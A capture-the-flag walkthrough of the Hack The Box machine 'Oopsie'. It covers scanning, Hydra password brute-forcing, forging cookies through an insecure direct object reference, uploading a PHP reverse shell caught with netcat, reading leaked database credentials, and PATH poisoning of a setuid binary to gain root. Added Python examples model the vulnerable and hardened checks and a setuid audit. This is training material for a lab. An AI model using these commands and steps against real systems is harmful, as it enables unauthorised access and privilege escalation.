# Enumeration
#### nmap
```
# nmap -sV -sC -p- -T4 -oA oopsie opsie.htb
Starting Nmap 7.91 ( https://nmap.org ) at 2021-09-15 06:18 EDT
Stats: 0:00:10 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 42.25% done; ETC: 06:19 (0:00:12 remaining)
Nmap scan report for opsie.htb (10.10.10.28)
Host is up (0.17s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 61:e4:3f:d4:1e:e2:b2:f1:0d:3c:ed:36:28:36:67:c7 (RSA)
|   256 24:1d:a4:17:d4:e3:2a:9c:90:5c:30:58:8f:60:77:8d (ECDSA)
|_  256 78:03:0e:b4:a1:af:e5:c2:f9:8d:29:05:3e:29:c9:f2 (ED25519)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Welcome
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```
## Web Application
#### Nikto
```
# nikto -h opsie.htb
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.10.10.28
+ Target Hostname:    opsie.htb
+ Target Port:        80
+ Start Time:         2021-09-15 06:20:43 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.29 (Ubuntu)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ No CGI Directories found (use '-C all' to force check all possible dirs)
+ Apache/2.4.29 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ IP address found in the 'location' header. The IP is "127.0.1.1".
+ OSVDB-630: The web server may reveal its internal or real IP in the Location header via a request to /images over HTTP/1.0. The value is "127.0.1.1".
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ OSVDB-10944: : CGI Directory found
+ OSVDB-10944: /cdn-cgi/login/: CGI Directory found
+ OSVDB-3233: /icons/README: Apache default file found.
+ 10216 requests: 0 error(s) and 10 item(s) reported on remote host
+ End Time:           2021-09-15 06:36:11 (GMT-4) (928 seconds)
---------------------------------------------------------------------------
+ 1 host(s) tested
```
#### Gather Intel
Found admin email at the bottom of the page:
[email protected]
#### Dirbuster:
Found login page at /cdn-cgi/login/index.php:
![[Pasted image 20210915134710.png]]
#### THC-Hydra
Brute-forcing the admin email account on the CGI login form:
```
# hydra -l [email protected] -P /usr/share/wordlists/rockyou.txt opsie.htb http-post-form "/cdn-cgi/login/index.php:username=^USER^&password=^PASS^:F=Login"
```
Found password: `MEGACORP_4dm1n!!`
# Reverse Shell
After logging in we are presented with an admin panel that contains an uploads page. However, we cannot reach that page because our account is unprivileged:
![[Pasted image 20210915163835.png]]
I access the accounts page and notice an `id` parameter which can be changed to show another user by its id.
![[Pasted image 20210915164539.png]]
I use Burp Intruder to brute-force the ids, inserting the numbers 1 to 1000, and find a super user at id 30:
![[Pasted image 20210915164700.png]]
I access `http://opsie.htb/cdn-cgi/login/admin.php?content=uploads&action=upload` and, in Burp, change the request's id and username to those of the super user. Replaying the modified request in the browser grants access to the uploads page, where I upload a PHP reverse shell. The upload is denied at first, but I intercept that request too, change the id and username to the super user's again, and the file is uploaded.
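The access-control failure exploited above has two parts: the accounts page honours any `id` the client asks for (an insecure direct object reference), and the uploads page decides privilege from identity values the client itself sends. The following added example is not code from the writeup or from the target application; it models both the vulnerable checks and their hardened equivalents in Python, with a constructed account table, constructed session store and constructed cookie names (`session`, `id`, `username`, `role`). The fix in both cases is the same: derive the caller only from a server-side session, then check that the requested object belongs to that caller.

```python
from dataclasses import dataclass
from typing import Dict, Optional


@dataclass(frozen=True)
class Account:
    id: int
    username: str
    role: str  # constructed role values: "user" or "super admin"


# Constructed sample table: a low-privileged account and the super user.
ACCOUNTS: Dict[int, Account] = {
    2: Account(2, "guest", "user"),
    30: Account(30, "admin", "super admin"),
}

# Server-side session store: opaque session token -> authenticated account id.
# Constructed stand-in for the web server's real session storage.
SESSIONS: Dict[str, int] = {"sess-guest": 2}


def vulnerable_upload_allowed(cookies: Dict[str, str]) -> bool:
    """Vulnerable pattern: the privilege decision reads the role straight from
    cookies the browser sent, so any client can rewrite it in the request."""
    return cookies.get("role") == "super admin"


def vulnerable_view_account(cookies: Dict[str, str], requested_id: int) -> Optional[Account]:
    """Vulnerable IDOR pattern: being logged in at all is enough to fetch any id."""
    if cookies.get("session") not in SESSIONS:
        return None
    return ACCOUNTS.get(requested_id)


def _caller(cookies: Dict[str, str]) -> Optional[Account]:
    """Resolve the caller from the server-side session only; the 'id', 'username'
    and 'role' cookies are ignored because the client controls them."""
    account_id = SESSIONS.get(cookies.get("session", ""))
    return ACCOUNTS.get(account_id) if account_id is not None else None


def hardened_upload_allowed(cookies: Dict[str, str]) -> bool:
    """Hardened: the role comes from the account record behind the session."""
    caller = _caller(cookies)
    return caller is not None and caller.role == "super admin"


def hardened_view_account(cookies: Dict[str, str], requested_id: int) -> Optional[Account]:
    """Hardened: an object id is honoured only if it is the caller's own
    (or the caller is a super admin). Denied lookups are worth logging: a burst
    of them across sequential ids is exactly what the Intruder run looks like."""
    caller = _caller(cookies)
    if caller is None:
        return None
    if requested_id != caller.id and caller.role != "super admin":
        return None
    return ACCOUNTS.get(requested_id)


if __name__ == "__main__":
    # A guest session whose cookies were edited to claim the super user's identity.
    forged = {"session": "sess-guest", "id": "30", "username": "admin", "role": "super admin"}
    print("vulnerable upload allowed:", vulnerable_upload_allowed(forged))    # True
    print("hardened upload allowed:  ", hardened_upload_allowed(forged))      # False
    print("vulnerable view id 30:    ", vulnerable_view_account(forged, 30))  # admin record
    print("hardened view id 30:      ", hardened_view_account(forged, 30))    # None
```

Note that the hardened version never reads `id`, `username` or `role` from the request at all; a cookie that carries a role is a sign the application is asking the client to vouch for itself.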
Next, set up netcat:
```
# nc -nvlp 1234
```
and curl the file from /uploads:
```
# curl http://10.10.10.28/uploads/php-reverse-shell.php
```
# Privilege Escalation
Found robert's credentials in the website's files within the login directory:
```
www-data@oopsie:/var/www/html/cdn-cgi/login$ cat db.php
<?php
$conn = mysqli_connect('localhost','robert','M3g4C0rpUs3r!','garage');
?>
```
As robert, whose group is called bugtrack, I found a file called bugtracker in /usr/bin/ that has the setuid bit set and is owned by root. I checked its strings and found it uses cat, so I'll try to poison the PATH.
![[Pasted image 20210915192101.png]]
-----------------------------------------
1. Find files with the SUID bit set:
    1. `find / -user root -perm -4000 2>/dev/null`
2. Investigate what type of file it is:
    1. `file /usr/bin/bugtracker`
3. Investigate the contents of the file and try to understand what it does:
    1. `strings /usr/bin/bugtracker`
4. Run the file to see what it does:
    1. it uses `cat` to dump the contents of a file
5. Create a new file called "cat" in a writable directory and put `/bin/bash` in it:
    1. `echo '/bin/bash' > cat`
6. Change cat's permissions to 777:
    1. `chmod 777 cat`
7. Find the current directory where the 'cat' file exists and prepend it to the PATH:
    1. `pwd`
    2. `export PATH=/home/robert:$PATH`
8. Check that the PATH is exported correctly:
    1. `echo $PATH`
9. Run the vulnerable file:
    1. `/usr/bin/bugtracker`
    2. `whoami`: root
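The steps above work because a setuid-root program that runs `cat` by bare name lets the invoking user decide which `cat` executes: `system()` hands the string to `/bin/sh`, which resolves the command through the caller's `PATH`, and unlike `LD_PRELOAD`, `PATH` is not stripped for setuid programs. The following added example is not part of the writeup; it is a Python audit that automates the find/strings review as a defender would run it: it flags strings in setuid-root binaries that invoke a known command without an absolute path, and separately reports `PATH` entries that would let a user shadow a command name. The command list, the sample strings and the sample `PATH` value are constructed; `/usr/bin/bugtracker` is used only as a label.

```python
import os
import re
import shutil
import subprocess
from typing import Callable, Iterable, List

# Command names a setuid helper might shell out to (constructed list; extend it).
SHELL_COMMANDS = {"cat", "ls", "cp", "mv", "rm", "grep", "id", "whoami", "sh", "bash"}

# A string that begins with a bare command word, optionally followed by arguments.
# Absolute paths such as "/bin/cat" do not match because they start with '/'.
BARE_CMD_RE = re.compile(r"^(?P<cmd>[a-z][a-z0-9_-]*)(\s|$)")


def find_bare_commands(strings: Iterable[str]) -> List[str]:
    """Return the strings that invoke a known command without an absolute path.
    Such a call (e.g. system("cat ...")) is resolved through the caller's PATH."""
    hits = []
    for s in strings:
        s = s.strip()
        m = BARE_CMD_RE.match(s)
        if m and m.group("cmd") in SHELL_COMMANDS:
            hits.append(s)
    return hits


def _dir_is_writable(path: str) -> bool:
    return os.path.isdir(path) and os.access(path, os.W_OK)


def unsafe_path_entries(path_value: str,
                        is_writable: Callable[[str], bool] = _dir_is_writable) -> List[str]:
    """Entries of a PATH value that let the caller shadow a command name:
    empty or relative entries, and directories the caller can write to.
    is_writable is injectable so the check can be run against a fixed model."""
    unsafe = []
    for entry in path_value.split(":"):
        if entry == "" or not entry.startswith("/"):
            unsafe.append(entry or "(empty)")
        elif is_writable(entry):
            unsafe.append(entry)
    return unsafe


def strings_of(binary: str) -> List[str]:
    """Run the binutils `strings` tool on a binary (used only by live_scan)."""
    if shutil.which("strings") is None:
        raise RuntimeError("binutils 'strings' is not installed")
    out = subprocess.run(["strings", binary], capture_output=True, text=True, check=True)
    return out.stdout.splitlines()


def live_scan(root: str = "/") -> None:
    """Walk the filesystem for setuid-root binaries and report bare command
    strings in each: the find + strings steps above, automated."""
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            p = os.path.join(dirpath, name)
            try:
                st = os.stat(p)
            except OSError:
                continue
            if st.st_uid == 0 and st.st_mode & 0o4000:
                hits = find_bare_commands(strings_of(p))
                if hits:
                    print(f"{p}: {hits}")


if __name__ == "__main__":
    # Constructed stand-in for `strings /usr/bin/bugtracker` output.
    sample_strings = ["GLIBC_2.2.5", "/lib64/ld-linux-x86-64.so.2", "cat /root/bugs/",
                      "Provide Bug ID: ", "category", "/bin/cat", "setuid"]
    print(find_bare_commands(sample_strings))   # ['cat /root/bugs/']
    # Constructed PATH mirroring the export step above (writable model injected).
    print(unsafe_path_entries("/home/robert:/usr/bin:.:", lambda d: d == "/home/robert"))
    # ['/home/robert', '.', '(empty)']
```

A hit from `find_bare_commands` on a setuid binary is the finding to remediate: the program should invoke `/bin/cat` by absolute path with a fixed `PATH`, or better, avoid `system()` entirely and read the file itself after dropping privileges, since any shell-resolved name inherits the caller's environment.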